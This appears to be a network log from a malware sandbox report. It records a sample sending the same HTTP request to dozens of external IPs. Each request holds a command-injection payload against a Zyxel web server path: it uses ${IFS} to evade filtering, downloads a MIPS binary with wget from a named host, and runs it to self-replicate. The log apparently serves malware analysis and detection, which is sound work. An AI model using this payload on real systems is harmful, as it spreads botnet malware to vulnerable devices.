                                                  Jan 19, 2024 18:23:46.867851973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2221192.168.2.135015882.78.109.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.867898941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2222192.168.2.1336142205.213.119.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.867948055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2223192.168.2.1344438156.86.158.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.867974997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2224192.168.2.135564092.223.224.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.868016005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2225192.168.2.134430614.0.78.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.868057966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2226192.168.2.1345036212.186.2.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.868081093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2227192.168.2.135729092.45.231.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.868134022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2228192.168.2.134832431.144.221.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.868168116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2229192.168.2.134316031.229.58.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.868196964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2230192.168.2.1343464187.15.63.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.868237019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2231192.168.2.135137885.178.108.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.868273973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2232192.168.2.134381044.255.100.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.868283987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2233192.168.2.1344644202.46.194.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.868328094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2234192.168.2.1355628146.208.148.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.868359089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2235192.168.2.134668490.33.146.189443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.868405104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2236192.168.2.1345520193.59.130.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.868451118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2237192.168.2.135871874.230.187.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.868494987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2238192.168.2.1346804167.16.213.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.868539095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2239192.168.2.1359810212.179.186.33443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.868592024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2240192.168.2.13493928.191.3.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.868618011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2241192.168.2.1346470177.224.68.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.868659973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2242192.168.2.1359112204.115.78.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.868694067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2243192.168.2.1342416195.97.218.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.868746996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2244192.168.2.1349458167.121.231.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.868782043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2245192.168.2.134907885.155.125.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.868841887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2246192.168.2.1355370167.126.113.75443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.868870974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2247192.168.2.1349198101.84.180.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.868918896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2248192.168.2.1352322124.72.221.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.868944883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2249192.168.2.1358478106.3.166.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.868983030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2250192.168.2.1347162218.109.148.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.869049072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2251192.168.2.134397044.1.215.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.869071960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2252192.168.2.134644217.190.206.179443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.869096041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2253192.168.2.1334826189.222.29.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.869122982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2254192.168.2.134536234.176.26.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.869138956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2255192.168.2.134599444.59.44.10443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.869167089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2256192.168.2.1338044123.132.71.12443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.869241953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2257192.168.2.133663077.139.187.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.869286060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2258192.168.2.1337634157.141.208.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.869333982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2259192.168.2.1343406116.247.73.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.869368076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2260192.168.2.1334454181.66.197.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.869400978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2261192.168.2.134093071.227.131.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.869453907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2262192.168.2.1336842191.185.148.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.869479895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2263192.168.2.134523894.241.152.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.869518995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2264192.168.2.133413693.108.81.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.869548082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2265192.168.2.134485424.113.57.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.869570017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2266192.168.2.133610640.13.177.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.869622946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2267192.168.2.1344224161.53.197.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.869661093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2268192.168.2.1358678151.168.95.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.869721889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2269192.168.2.1340536176.72.96.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.869762897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2270192.168.2.1354004179.24.91.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.869798899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2271192.168.2.133602412.102.231.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.869852066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2272192.168.2.1333732165.142.186.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.869879007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2273192.168.2.135970282.79.133.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.869925022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2274192.168.2.1346760218.123.147.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.869973898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2275192.168.2.134734896.80.181.189443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.870007992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2276192.168.2.1344712111.37.166.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.870054007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2277192.168.2.134670451.247.145.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.870095015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2278192.168.2.1349034195.10.12.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.870131969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2279192.168.2.134218842.217.194.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.870162010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2280192.168.2.1334936150.91.228.115443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.870192051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2281192.168.2.1358898164.198.240.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.870246887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2282192.168.2.1342000118.144.63.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.870286942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2283192.168.2.135657896.75.82.109443
                                                  TimestampBytes transferredDirectionData
